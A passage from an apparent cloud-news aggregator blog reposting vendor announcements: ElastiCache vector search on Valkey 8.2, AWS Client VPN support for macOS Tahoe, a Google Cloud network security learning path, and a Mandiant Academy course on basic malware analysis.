Key use cases include semantic caching for large language models (LLMs) and multi-turn conversational agents, which significantly reduce latency and cost by caching semantically similar queries. Vector search for ElastiCache also powers agentic AI systems with Retrieval Augmented Generation (RAG) to ensure highly relevant results and consistently low latency across multiple retrieval steps. Additional use cases include recommendation engines, anomaly detection, and other applications that require efficient search across multiple data modalities.

Vector search for ElastiCache is available with Valkey version 8.2 on node-based clusters in all AWS Regions at no additional cost. To get started, create a Valkey 8.2 cluster using the AWS Management Console, AWS Software Development Kit (SDK), or AWS Command Line Interface (CLI). You can also use vector search on your existing clusters by upgrading from any version of Valkey or Redis OSS to Valkey 8.2 in a few clicks with no downtime. To learn more about vector search for ElastiCache for Valkey read this blog and for a list of supported commands see the ElastiCache documentation.

Read More for the details.

2025 10 10

AWS – AWS Client VPN is now supporting MacOS Tahoe

Tibor Kiss AWS, Cloud AWS

AWS Client VPN now supports MacOS Tahoe client with version 5.3.1. You can now run the AWS supplied VPN client on the latest MacOS versions. AWS Client VPN desktop clients are available free of charge, and can be downloaded here.

AWS Client VPN is a managed service that securely connects your remote workforce to AWS or on-premises networks. It supports desktop clients for MacOS, Windows x64, Windows Arm64 and Ubuntu-Linux. With client version 5.3.1 onwards, Client VPN now supports the MacOS Tahoe 26.0. It already supports Mac OS version 13.0, 14.0 and 15.0, Windows 10 (x64) and Windows 11 (Arm64 and x64), and Ubuntu Linux 22.04 and 24.04 LTS versions.
To learn more about Client VPN:

Visit the AWS Client VPN product page
Read the AWS Client VPN documentation
Read the AWS Client VPN user guide

Read More for the details.

2025 10 10

GCP – Build in-demand network security skills with the new Google Cloud learning path

Tibor Kiss Cloud, Google Cloud gcp

Protecting your organization from cyber threats is essential for ensuring smooth operations and meeting compliance requirements. Specialized defense has become more urgent as sensitive data and critical applications have migrated to the cloud. Security is no longer about perimeter firewalls; it’s about securing dynamic cloud networks.

Recognizing the increasing demand for skilled cloud security professionals, Google Cloud is launching a new Network Security Learning Path that culminates in the Designing Network Security in Google Cloud advanced skill badge. This comprehensive program, designed by our experts, equips you with the validated skills needed to protect sensitive data and applications, ensure business continuity, and drive growth.

Earning the Designing Network Security in Google Cloud skill badge can be a powerful catalyst for career advancement. According to an Ipsos study commissioned by Google Cloud, 70% of learners said that cloud learning has contributed to their goal of getting promoted, and 76% said their income has increased since they started using Google Cloud Learning Services.

A complete learning journey

More than just a single course, this new learning path is a complete journey that focuses on solutions based learning for networking, infrastructure or security roles. You learn how to design, build, and manage secure networks to protect your data and applications and validate your proficiency in handling real-world scenarios, such as next-gen firewall policy violations and data exfiltration. Completing the path earns you the Designing Network Security in Google Cloud skill badge.

You’ll learn how to:

Design and implement secure network topologies, from building secure VPC networks to locking down Google Kubernetes Engine (GKE) environments.
Master Google Cloud Next Generation Firewall (NGFW) to configure precise firewall rules and networking policies, giving you full control over traffic flow.
Establish secure connectivity across different environments with Cloud VPN and Cloud Interconnect.
Enhance your defenses using Google Cloud Armor for a layered approach to WAF and DDoS protection.
Apply granular identity and access management (IAM) permissions for network resources.
Extend these principles to secure complex hybrid and multicloud architectures.

Empowering you to secure your future

This learning path can be your answer to the persistent cybersecurity skills gap. It can empower you to build the skills needed for the next generation of network security.

To earn the skill badge, at the end of the path you’ll tackle a hands-on, break-fix challenge lab that validates your proficiency in handling real-world scenarios like firewall policy violations and data exfiltration.

Get the skills to confidently protect your organization’s cloud network by enrolling in the Google Cloud Network Security Learning Path today.

Read More for the details.

2025 10 10

GCP – Mandiant Academy: Basic Static and Dynamic Analysis course now available

Tibor Kiss Cloud, Google Cloud gcp

Understanding malware functionality and analysis processes can be a thorny ball of string. To help IT and information security professionals, corporate investigators, and anyone else get started in pursuing malware analysis as a primary specialty, Mandiant Academy’s new “Basic Static and Dynamic Analysis” course can help enhance your binary triage toolkit.

This course also provides critical core skills for digital forensics, threat research, and threat hunting. It offers practical techniques for static and dynamic analysis of malicious files, requiring minimal prerequisites.

This is a hands-on course that puts participants on the front lines with realistic malware threats and the tools to understand them. Students will use a provided Virtual Machine to analyze and create their own controlled malware detonation environment.

Learn static analysis by exploring the Portable Executable (PE) file format, extracting metadata, and identifying relevant strings. Master dynamic analysis by observing malware in controlled environments, monitoring system events and network traffic, and unpacking/dumping running processes.

Students will gain the ability to triage malicious compiled Windows PE files, improving their understanding of suspicious alerts and files.

After completing this course, participants should be able to:

Explain the basics of malware analysis and Indicators of Compromise (IOCs)
Describe how malware analysis and IOCs fit into the investigative process
Create a safe environment to examine and execute malware samples without risk to systems or networks
Triage malware using hands-on basic static and dynamic analysis techniques

The course consists of the following modules, with labs included throughout the instruction.

Basic Static Analysis – An overview of the techniques, concepts, and tools needed to efficiently analyze malware without execution as well as a thorough introduction to the structure of the PE file format and its most commonly examined artifacts. This module also covers string data types, hashing and hash collisions, data encoding and encryption, and binary packing.
Basic Dynamic Analysis – An overview of the tools and strategies needed to analyze malware in a controlled execution environment, including host activity monitoring and network interception, memory capture, and file and registry change detection.

While programming experience isn’t required, some knowledge in this area is beneficial. A strong background in computer science theory isn’t necessary, but a basic understanding of binary data and hexadecimal values is recommended, as is expert familiarity with operating system usage fundamentals such as using the command line, understanding executable file types, and basic programming concepts such as functions, variables, source code and compilation.

Sign up today

To learn more about Basic Static and Dynamic Analysis or to attend the course, please visit our website. You can access a wealth of knowledge through Mandiant Academy’s on-demand, instructor-led, and experiential training options. We hope this course proves helpful in your efforts to defend your organization against cyber threats.

Read More for the details.